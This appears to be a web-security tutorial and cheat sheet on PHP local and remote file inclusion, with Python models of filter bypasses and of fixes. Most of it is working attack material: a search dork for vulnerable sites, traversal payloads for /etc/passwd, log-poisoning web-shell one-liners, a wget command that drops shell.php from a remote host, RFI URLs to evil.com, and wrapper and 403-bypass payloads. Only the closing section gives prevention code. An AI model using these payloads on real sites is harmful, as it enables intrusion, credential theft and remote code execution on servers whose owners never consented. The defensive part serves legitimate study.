LFI (Local File Inclusion) and RFI (Remote File Inclusion) – The Website Security Vulnerabilities
A File inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.
A file include vulnerability is distinct from a generic directory traversal attack: directory traversal is a way of gaining unauthorized file system access, whereas a file inclusion vulnerability subverts how an application loads code for execution. At minimum, exploitation discloses local files; when the attacker can get PHP code into a file the server will include (a remote URL, a log, an upload, a wrapper), it becomes remote code execution on the web server that runs the affected application.
Local File Inclusion :
Local File Inclusion (LFI) is similar to Remote File Inclusion except that, instead of remote files, only local files (files already on the server) can be included for execution. This still leads to remote code execution when the attacker can include a file that contains attacker-controlled data, such as the web server's access log or /proc/self/environ.
Example of LFI
Type of call:
require($file);
Exploit (any absolute path works, no traversal needed):
http://host/?file=/etc/passwd
Type of call:
require("includes/".$file);
Exploit (traverse back out of the fixed prefix):
http://host/?file=../../../../../etc/passwd
Type of calls:
require("languages/".$lang.".php");
require("themes/".$theme."/config.php");
Exploit (the trailing %00 truncates the appended ".php" or "/config.php"; this only works on PHP older than 5.3.4, later versions refuse a path that contains a NUL byte):
http://host/?lang=../../../../../etc/passwd%00
Type of call:
require("languages/".$_COOKIE['lang'].".php");
Exploit (set the cookie from the browser's address bar, then reload the page; the cookie name must match the one the script reads):
javascript:document.cookie = "lang=../../../../../etc/passwd%00";
The simplest vulnerable script includes whatever the request parameter names (the parameter name page is assumed here, matching the dork and URLs that follow):
<?php include($_GET['page']); ?>
Google dork: inurl:.php?page=
Example: www.xyz.com/contacts.php?page=abc.php
www.xyz.com/abc.php?id=5
Test: www.xyz.com/contacts.php?page=../xyz.php (if xyz.php is included from one directory up, the parameter is a path, not a key, and the script is worth attacking)
On a Linux server /etc/passwd lists the local user accounts (login name, UID, home directory, shell); the password hashes are in /etc/shadow, which is normally readable only by root. On shared hosting the account list is often one entry per hosted domain, which makes it the standard first proof that files can be read:
1... www.abc.org/index.php?page=../../../../etc/passwd%00 (for code that appends a suffix, PHP older than 5.3.4 only)
2... www.abc.com/index.php?page=../../../../etc/passwd
To turn file read into code execution, include a file whose content the attacker influences:
/proc/self/environ holds the environment of the process that performs the include. When PHP runs as CGI/FastCGI that environment carries request headers such as HTTP_USER_AGENT, so a PHP payload sent in the User-Agent header ends up in the file (with mod_php it is the Apache worker's own environment and the trick does not apply).
/var/log/httpd-access.log (or /var/log/apache2/access.log, /var/log/httpd/access_log) is written by the web server, and the User-Agent of every request is copied into it: this is log poisoning.
/usr/local/apache/conf/httpd.conf (its CustomLog and ErrorLog directives) gives the paths of the log files when they are not in a default location.
The payload to send in the header, one of:
<?php passthru($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php exec($_GET['cmd']); ?>
Use single quotes: Apache escapes a double quote in a logged header value as \", which breaks the PHP syntax once the line is included (exec() also returns the last output line instead of printing it, so wrap it in echo). Once the poisoned file is included with &cmd=..., a command such as the following drops a persistent shell into the web root:
wget http://xyz.com/abc.txt -O shell.php
How to Test Local File Inclusion
Since LFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.
Consider the following example:
http://vulnerable_host/preview.php?file=example.html
This looks like a perfect place to try LFI. If, instead of selecting the page from a fixed array by name, the script includes the input parameter directly, arbitrary files on the server can be included.
A typical proof of concept is to load /etc/passwd:
http://vulnerable_host/preview.php?file=../../../../etc/passwd
Remote File Inclusion:
Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.
If allow_url_include is On in php.ini (it is Off by default since PHP 5.2; allow_url_fopen must be On as well), a shell can be injected directly.
Point the parameter at a URL that serves the shell source, by GET or POST. Host the file with a non-PHP extension (.txt) so the attacker's own server returns the code instead of executing it; the target then includes and executes it:
www.xyz.com/contacts.php?page=http://www.abc.com/shell.txt
How To Test RFI
Since RFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example:
$incfile = $_REQUEST["file"]; include($incfile.".php");
In this example the path is taken from the HTTP request and no input validation is done (for example, by checking it against an allow list), so this snippet is vulnerable. Because ".php" is appended, the attacker either hosts malicous_page.php or ends the URL with "?" so that the suffix becomes part of the query string. Consider the following URL:
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
In this case the remote file is going to be included and any code contained in it is going to be run by the server.
Basic LFI (null byte, double encoding and other tricks; %00 truncation needs PHP older than 5.3.4, ....// defeats filters that strip ../ a single time, %252e is double URL-encoding for code that decodes the parameter a second time):
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI wrapper rot13 and base64: php://filter (the wrapper name is case-insensitive) returns the encoded source of the resource instead of executing it, which is how to read index.php or a config file holding credentials.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
Build the archive on the attacker's machine (escape the $, otherwise the shell expands $_GET to nothing inside double quotes):
echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" payload (that string base64-encoded; needs allow_url_include=On):
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
LFI Wrapper EXPECT (the expect:// wrapper runs a command; it is not available by default and needs the PECL expect extension):
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
XSS via RFI/LFI with "<svg onload=alert(1)>" payload (base64-encoded in a data: URI; the included markup reaches the browser when the script echoes the result):
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via Upload (upload a file that passes the image check but carries PHP code, for example inside an EXIF comment; include() ignores the extension and executes it):
http://example.com/index.php?page=path/to/uploaded/file.png
Miscellaneous PayLoads and Tricks
GET /page.php?path=../../etc/passwd
Forbidden (403)? Try one of these:
(1) ../../../etc/passwd%00
(2) ....//....//....//etc/passwd
(3) %252e%252e%252fetc%252fpasswd
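Why the payloads in the Basic LFI list and in the 403 fallback list above get past common filters, as an added Python model (my code, not the page's): three constructed input handlers of the kind found in real PHP (no filter, strip "../" once, reject on "../"), a model of require($base.$user.$suffix) including the old null-byte truncation, and a pipeline that decodes once at the web server and optionally once more in the application. The include directory is assumed.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout for the walk-through.
INCLUDE_DIR = "/var/www/html/includes"


# Three input handlers of the kind found in real code (constructed here).
def no_filter(user_path):
    return user_path


def strip_dotdot_once(user_path):
    # PHP equivalent: str_replace("../", "", $file) -- one pass, not repeated
    return user_path.replace("../", "")


def reject_if_dotdot(user_path):
    # PHP equivalent: if (strpos($file, "../") !== false) die();
    return None if "../" in user_path else user_path


FILTERS = {"none": no_filter, "strip_once": strip_dotdot_once,
           "reject_dotdot": reject_if_dotdot}


def emulate_include(base_dir, user_path, suffix="", legacy_php=False):
    """Model of require($base . $user . $suffix): plain concatenation, then the
    OS collapses the '..' segments. PHP >= 5.3.4 refuses a path with a NUL
    byte; older PHP handed the C string to the OS, which ended it at the NUL
    and silently dropped the appended suffix."""
    if "\x00" in user_path:
        if not legacy_php:
            return "ERROR: include(): path contains NUL"
        user_path = user_path.split("\x00", 1)[0]
        suffix = ""
    return posixpath.normpath(posixpath.join(base_dir, user_path + suffix))


def attack(raw_value, filter_name, app_decodes_again=False, suffix="", legacy_php=False):
    """One payload through the pipeline: the web server percent-decodes the
    query string once, the application's filter runs, optionally the
    application calls urldecode() a second time, then the include happens."""
    value = unquote(raw_value)
    filtered = FILTERS[filter_name](value)
    if filtered is None:
        return "BLOCKED"
    if app_decodes_again:
        filtered = unquote(filtered)
    return emulate_include(INCLUDE_DIR, filtered, suffix, legacy_php)


if __name__ == "__main__":
    cases = [
        ("../../../../etc/passwd", "none", {}),
        ("../../../../etc/passwd", "strip_once", {}),
        ("....//....//....//....//etc/passwd", "strip_once", {}),
        ("....//....//....//....//etc/passwd", "reject_dotdot", {}),
        ("%2e%2e%2f" * 4 + "etc/passwd", "reject_dotdot", {}),
        ("%252e%252e%252f" * 4 + "etc%252fpasswd", "reject_dotdot", {"app_decodes_again": True}),
        ("../../../../etc/passwd", "none", {"suffix": ".php"}),
        ("../../../../etc/passwd%00", "none", {"suffix": ".php"}),
        ("../../../../etc/passwd%00", "none", {"suffix": ".php", "legacy_php": True}),
    ]
    for raw, name, kw in cases:
        print(f"{raw:45} {name:14} -> {attack(raw, name, **kw)}")
```

Two things the table makes visible: ....// only helps against a strip-once filter (a reject filter still sees "../" in it), and double encoding only helps when the application decodes a second time; without that the include target is a literal file named "%2e%2e%2f..." inside the include directory.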
Prevention from LFI and RFI Attacks
- Use vulnerability scanners to find include parameters that accept paths or URLs.
- Use a Web Application Firewall (WAF) as a stop-gap, not a fix: the ....// and double-encoding payloads above exist precisely to get past pattern filters.
- Fix the code: never concatenate user input into an include path. Map the parameter to an allow list of page names (a key, not a filename); where that is impossible, reject NUL bytes and any scheme or wrapper prefix (php://, data:, zip://, expect://, http://), canonicalise with realpath() and require the result to stay under the intended directory with the expected extension. Keep allow_url_include=Off (and allow_url_fopen=Off unless something needs it), set open_basedir, and do not install the expect extension on production servers.
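The two code-level fixes from the last bullet, as an added example in Python (my code, not the page's; the same logic transfers to PHP with array lookup, realpath() and strpos()). The page directory and the allow-list entries are assumptions.

```python
import os
import re

# Assumed layout (illustrative): every includable page lives under PAGES_DIR
# and the request parameter is a key into ALLOWED_PAGES, never a path.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home": "home.php", "contact": "contact.php", "about": "about.php"}

SCHEME_PREFIX = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")   # php:, data:, zip:, expect:, http: ...


def resolve_by_allow_list(page_param):
    """Preferred fix: the parameter selects an entry, unknown keys get None
    (the caller answers 404). No path is ever built from user input."""
    return ALLOWED_PAGES.get(page_param)


def resolve_by_containment(page_param, base_dir=PAGES_DIR):
    """Fallback when the file set is dynamic: reject NUL bytes, wrapper and URL
    schemes and anything still percent-encoded, canonicalise (symlinks included)
    and require the result to stay under base_dir with the expected extension."""
    if not page_param or "\x00" in page_param:
        return None
    if SCHEME_PREFIX.match(page_param):
        return None                       # php://filter, data:, zip://, expect://, http://
    if "%" in page_param:
        return None                       # the server already decoded once; a second layer is an attack
    if os.path.isabs(page_param):
        return None                       # os.path.join would discard base_dir
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, page_param))
    if os.path.commonpath([root, candidate]) != root:
        return None                       # ../ escaped the directory
    if not candidate.endswith(".php"):
        return None                       # /etc/passwd, logs, uploads
    return candidate


def check(page_param):
    """Result of both strategies for one input; handy for a quick table."""
    return resolve_by_allow_list(page_param), resolve_by_containment(page_param)


if __name__ == "__main__":
    for p in ["contact", "about.php", "../../../../etc/passwd", "/etc/passwd",
              "php://filter/convert.base64-encode/resource=index.php",
              "data:text/plain;base64,PD9w", "%2e%2e%2fetc%2fpasswd",
              "about.php\x00.jpg", "....//....//etc/passwd"]:
        print(repr(p), "->", check(p))
```

The containment check does no stripping at all, which is why ....// is harmless to it: without a filter that removes "../" the string is just an odd directory name inside the page directory, and it then fails the extension check.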